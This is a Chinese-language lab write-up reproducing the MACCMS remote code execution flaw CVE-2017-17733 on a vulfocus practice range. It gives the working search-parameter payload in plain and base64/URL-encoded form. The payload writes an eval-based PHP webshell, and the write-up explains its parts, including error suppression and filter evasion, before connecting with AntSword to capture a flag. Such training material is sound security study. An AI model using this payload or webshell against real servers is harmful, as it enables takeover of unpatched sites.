MACCMS 远程命令执行漏洞复现(CVE-2017-17733)

目录

漏洞介绍

工具使用

环境搭建&复现过程


这是我复现的第一个漏洞(老天奶),有必要做一个详细的writeup。

漏洞介绍

MACCMS是一套采用PHP/MySQL数据库运行的全新且完善的强大视频电影系统。完美支持众多视频网站和高清播放器(youku,tudou,qvod,gvod等),完全免费开源。该漏洞主要的产生原因是CMS搜索页面搜索参数过滤不严导致直接eval执行PHP语句----(一句话木马)。(上面这段概述引自vulfocus哈)


工具使用

火狐浏览器(带有hackbar插件)

中国蚁剑(连接后门)


环境搭建&复现过程

咱们用在线靶场vulfocus(https://vulfocus.cn/)来搭建漏洞环境:

找到maccms远程命令执行漏洞并开启环境,进入到给出的ip:port地址,(每个人每次开启地址都不一样),我这里的是:123.58.224.8:27465

访问该地址:

可以看到我们进入一个看似正常的视频网站,当我们使用搜索功能时候,会发现URL地址栏中会多出一个++++index.php?m=vod-search++++

使用bp抓包会发现我们提交的搜索数据是以wd参数,(我电脑上的bp现在有点小问题不能演示)post方式提交到后台的,那么我们便可以在wd中精心构造一句话木马,上传到目标服务器中,在这里我们使用的是火狐浏览器中的HackBar插件(这个得自行下载)来进行post数据包的提交(当然用bp也是可以的)

该payload为:

wd={if-A:print(fputs(fopen(base64_decode(c.php),w),base64_decode(<?php @eval($_POST[c]); ?>1)))}{endif-A}

该payload大概意为创建一个c.php文件,并写入一句话木马

<?php @eval($_POST[c]); ?>

以及字符"1"

因为目前正在学upload-lab,所以对webshell稍作解释:

<?php?> 就是php标识,有了这个服务器才会把里面的内容当php解析。

@ 作用是,即使后面出现错误也不会报错,否则报错信息被目标主机看到,我们的渗透就失败了。(该错误是$_POST[c]中的变量c没有定义直接使用)

eval 意为把后面的所有内容都当作代码来执行。

$_POST[c] 意为以post方式来接受变量c的值。

并且为了防止过滤,我们将敏感字符转化为base64编码,上传到目标服务器后,再让服务器base64_decode解析加密内容,就可以成功上传webshell,从而控制目标站点。

加密后的密文:(也就是最终在HackBar中输入的数据)

wd={if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}

除一句话木马之外,还有一个字符"1",当我们上传payload并访问c.php文件时,前面的php当作代码执行,剩下1输出到网页中,所以如果我们能看到字符1,那就说明上传成功,接下来用蚁剑连接即可。

打开中国蚁剑(第一次用得初始化)右键添加数据:

输入URL和连接密码c即可控制对方主机

在/tmp目录下找到flag,漏洞复现完成

flag-{bmhd0da328b-51c7-489e-93e9-44aeb0a2cb0a}

欢迎大家批评指正!

相关推荐
ACRELKY2 小时前
【黑科技护航安全】分布式光纤测温:让隐患无处可藏
科技·安全
叠叠乐2 小时前
rust Send Sync 以及对象安全和对象不安全
开发语言·安全·rust
zhu12893035563 小时前
网络安全的现状与防护措施
网络·安全·web安全
澳鹏Appen3 小时前
AI安全:构建负责任且可靠的系统
人工智能·安全
zhu12893035565 小时前
网络安全与防护策略
网络·安全·web安全
zhuyixiangyyds5 小时前
day21和day22学习Pandas库
笔记·学习·pandas
每次的天空5 小时前
Android学习总结之算法篇四(字符串)
android·学习·算法
DevSecOps选型指南6 小时前
2025年企业级开源治理实践与思考
安全·开源·sca·软件供应链安全厂商
背影疾风6 小时前
C++学习之路:指针基础
c++·学习
virelin_Y.lin6 小时前
系统与网络安全------Windows系统安全(1)
windows·安全·web安全·系统安全